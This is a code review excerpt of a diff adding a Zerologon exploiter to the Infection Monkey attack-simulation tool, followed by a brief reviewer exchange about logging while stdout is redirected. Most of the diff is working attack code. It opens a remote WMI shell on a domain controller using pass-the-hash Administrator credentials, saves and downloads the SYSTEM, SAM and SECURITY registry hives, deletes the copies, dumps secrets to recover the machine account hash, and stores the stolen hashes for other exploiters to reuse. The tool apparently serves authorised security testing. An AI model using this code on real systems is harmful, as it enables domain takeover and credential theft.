monkey/infection_monkey/exploit/zerologon.py

```diff
@@ -0,0 +1,743 @@
+                'username': user,
+                'password': '',
+                'lm_hash': lmhash,
+                'ntlm_hash': nthash
+            }
+        })
+
+    def add_extracted_creds_to_monkey_config(self, user, lmhash, nthash):  # so other exploiters can use these creds
+        if user not in self._config.exploit_user_list:
+            self._config.exploit_user_list.append(user)
+
+        if lmhash not in self._config.exploit_lm_hash_list:
+            self._config.exploit_lm_hash_list.append(lmhash)
+
+        if nthash not in self._config.exploit_ntlm_hash_list:
+            self._config.exploit_ntlm_hash_list.append(nthash)
+
+    def get_original_pwd_nthash(self, admin_pwd_hashes):
+        if not self.save_HKLM_keys_locally(admin_pwd_hashes):
+            return
+
+        options = self.OPTIONS_FOR_SECRETSDUMP.copy()
+        for name in ['system', 'sam', 'security']:
+            options[name] = os.path.join(os.path.expanduser('~'), f'monkey-{name}.save')
+        options['dc_ip'] = self.dc_ip
+        options['just_dc'] = False
+
+        dumped_secrets = self.get_dumped_secrets(options=options,
+                                                 remote_name='LOCAL')
+        for secret in dumped_secrets:
+            if '$MACHINE.ACC: ' in secret:  # format of secret - "$MACHINE.ACC: lmhash:nthash"
+                nthash = secret.split(':')[2]
+                return nthash
+
+    def get_dumped_secrets(self, options, remote_name='', username='', password='', domain=''):
+        dumper = DumpSecrets(remote_name, username, password, domain, options)
+        dumped_secrets = dumper.dump().split('\n')
+        return dumped_secrets
+
+    def save_HKLM_keys_locally(self, admin_pwd_hashes):
+        LOG.debug("Starting remote shell on victim.")
+
+        wmiexec = Wmiexec(ip=self.dc_ip,
+                          username='Administrator',
+                          hashes=admin_pwd_hashes,
+                          domain=self.dc_ip)
+
+        remote_shell = wmiexec.get_remote_shell()
+        if remote_shell:
+            _set_stdout_to_in_memory_text_stream()
+
+            try:
+                # Save HKLM keys on victim.
+                remote_shell.onecmd('reg save HKLM\\SYSTEM system.save && ' +
+                                    'reg save HKLM\\SAM sam.save && ' +
+                                    'reg save HKLM\\SECURITY security.save')
+
+                # Get HKLM keys locally (can't run these together because it needs to call do_get()).
+                remote_shell.onecmd('get system.save')
+                remote_shell.onecmd('get sam.save')
+                remote_shell.onecmd('get security.save')
+
+                # Delete saved keys on victim.
+                remote_shell.onecmd('del /f system.save sam.save security.save')
+
+                wmiexec.close()
+
+                return True
+
+            except Exception as e:
+                LOG.info(f"Exception occured: {str(e)}")
```

Comment:
So we are not seeing this, right? Why log then?

Reply:
Why do you say not?

Reply:
```
    _orig_stdout = sys.stdout
     _new_stdout = io.StringIO()
     sys.stdout = _new_stdout
 ```
 Doesn't that also change LOG output to io.StringIO()?

Reply:
Nope